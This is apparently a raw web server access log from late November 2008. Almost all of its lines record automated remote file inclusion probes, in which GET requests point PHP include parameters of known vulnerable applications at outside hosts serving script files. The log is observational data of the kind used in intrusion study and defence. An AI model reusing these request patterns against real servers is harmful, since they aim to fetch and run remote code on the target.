66.232.122.239 - - [29/Nov/2008:10:41:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:11 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:17 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.249.70.41 - - [29/Nov/2008:10:41:21 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:22 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:22 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:41:25 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:41:40 -0800] "GET /logs/access_080122.log/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:41:49 -0800] "GET /errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:41:49 -0800] "GET /logs/access_080408.log/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:41:51 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
65.98.70.18 - - [29/Nov/2008:10:41:51 -0800] "GET /logs/access_081105.log/config.php?rootBase=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.70.18 - - [29/Nov/2008:10:41:52 -0800] "GET /config.php?rootBase=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.70.18 - - [29/Nov/2008:10:41:52 -0800] "GET /logs/config.php?rootBase=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.76 - - [29/Nov/2008:10:42:09 -0800] "GET /logs/access_080109.log HTTP/1.0" 200 621135 "-" "BlackBerry8310/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 Novarra-Vision/7.3" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:29 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:29 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.254.72.131 - - [29/Nov/2008:10:42:33 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://demo.pac-werbeagentur.de/lhf/website/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.186.158.77 - - [29/Nov/2008:10:42:40 -0800] "GET /logs/access_080207.log/index.php?screen=http://www.hebron.edu.hk/filecabinet/2004/controllo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.186.158.77 - - [29/Nov/2008:10:42:40 -0800] "GET /logs/index.php?screen=http://www.hebron.edu.hk/filecabinet/2004/controllo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.186.158.77 - - [29/Nov/2008:10:42:40 -0800] "GET /index.php?screen=http://www.hebron.edu.hk/filecabinet/2004/controllo.txt?? HTTP/1.1" 200 94828 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:46 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:46 -0800] "GET /skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:42:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.248.216.10 - - [29/Nov/2008:10:42:58 -0800] "GET /logs/access_080525.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)" "www.dmulk.com"
85.89.176.151 - - [29/Nov/2008:10:43:26 -0800] "GET /config.php?rootBase=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:43:28 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.89.176.151 - - [29/Nov/2008:10:43:31 -0800] "GET /logs/access_081105.log/config.php?rootBase=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.89.176.151 - - [29/Nov/2008:10:43:31 -0800] "GET /logs/config.php?rootBase=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:43:34 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:43:34 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:43:34 -0800] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:43:45 -0800] "GET /logs/access_080720.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:43:45 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:43:45 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 94597 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:44:23 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 94581 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:44:26 -0800] "GET /logs/access_080720.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:10:44:26 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:44:47 -0800] "GET /logs/access_080329.log/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:44:50 -0800] "GET /logs/access_080720.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:44:50 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:44:50 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 94613 "-" "Mozilla/5.0" "www.dmulk.com"
58.248.216.10 - - [29/Nov/2008:10:45:10 -0800] "GET /logs/access_080522.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:45:16 -0800] "GET /logs//include.php?path[docroot]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:45:17 -0800] "GET /logs/access_080502.log//include.php?path[docroot]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:45:17 -0800] "GET /include.php?path[docroot]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:45:17 -0800] "GET /logs/access_080430.log//include.php?path[docroot]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:45:30 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.254.72.131 - - [29/Nov/2008:10:45:31 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://demo.pac-werbeagentur.de/lhf/website/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:45:40 -0800] "GET /logs/access_081104.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.254.72.131 - - [29/Nov/2008:10:45:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://demo.pac-werbeagentur.de/lhf/website/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:45:49 -0800] "GET /logs/access_080720.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:45:49 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:45:50 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 94597 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:46:13 -0800] "GET /logs/access_080329.log/errors.php?error=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
204.187.100.22 - - [29/Nov/2008:10:46:25 -0800] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:28 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:28 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:28 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:28 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:28 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:33 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:33 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:33 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:33 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:34 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:35 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:46:35 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:46:35 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:46:35 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:46:35 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:48 -0800] "GET /logs/access_080828.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:10:46:48 -0800] "GET /logs/access_080828.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:10:46:53 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:10:46:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:10:46:54 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:46:54 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:46:54 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:46:55 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:46:56 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:47:03 -0800] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:04 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:06 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.213.186 - - [29/Nov/2008:10:47:21 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:22 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:22 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:28 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:28 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:47:35 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:47:35 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:47:36 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:47:41 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.157.179.128 - - [29/Nov/2008:10:47:49 -0800] "GET /logs/access_081104.log//skin/zero_vote/error.php?dir=http://pgeh.hs.kr/~meca/zb41pl4/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /logs/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:10:47:49 -0800] "GET /logs/homepage.php?sel=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:31 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:31 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:31 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:32 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:32 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:34 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
